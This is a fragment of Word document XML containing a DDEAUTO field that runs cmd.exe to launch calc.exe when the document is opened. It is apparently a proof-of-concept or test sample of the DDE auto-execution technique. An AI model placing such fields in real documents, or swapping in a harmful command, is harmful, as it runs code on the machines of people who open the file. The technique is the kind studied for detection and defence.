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  <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText> DDEAUTO c:\\Windows\\System32\\cmd.exe "/k calc.exe" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/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